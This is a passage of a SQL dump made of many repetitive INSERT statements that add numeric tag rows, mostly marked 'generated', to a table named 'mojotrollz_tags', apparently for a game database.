`table`, `type`, `value`, `comment`) VALUES (6369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6370, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6371, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6372, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6373, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6374, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6375, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6377, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6382, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6387, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6389, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6391, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6391, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6391, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6392, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6392, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6392, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6393, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6394, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6395, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6407, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6407, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6407, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6408, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6410, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6410, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6411, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6411, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6411, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6411, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6426, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6426, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6426, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6427, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6427, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6427, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6467, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6467, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6467, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6467, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6487, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6487, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6487, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6488, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6488, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6488, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6489, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6489, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6489, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6490, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6491, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6492, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6493, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6494, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6495, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6496, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6497, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6498, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6499, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6499, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6500, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6500, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6501, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6501, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6502, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6502, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6503, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6503, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6504, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6504, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6505, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6506, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6507, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6508, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6509, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6510, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6511, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6512, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6513, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6514, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6516, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6517, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6518, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6519, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6520, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6521, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6522, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6522, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6522, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6523, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6523, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6527, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6546, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6547, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6547, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6548, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6549, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6551, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6552, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6553, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6554, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6555, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6556, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6557, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6559, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6560, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6560, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6567, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6568, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6571, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6573, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6574, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6574, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6575, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6576, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6577, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6579, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6581, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6581, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6582, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6582, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6583, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6584, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6584, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6585, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6585, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6586, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6586, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6586, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6586, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6586, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6606, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6626, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6626, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6646, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6646, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6647, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6647, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6648, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 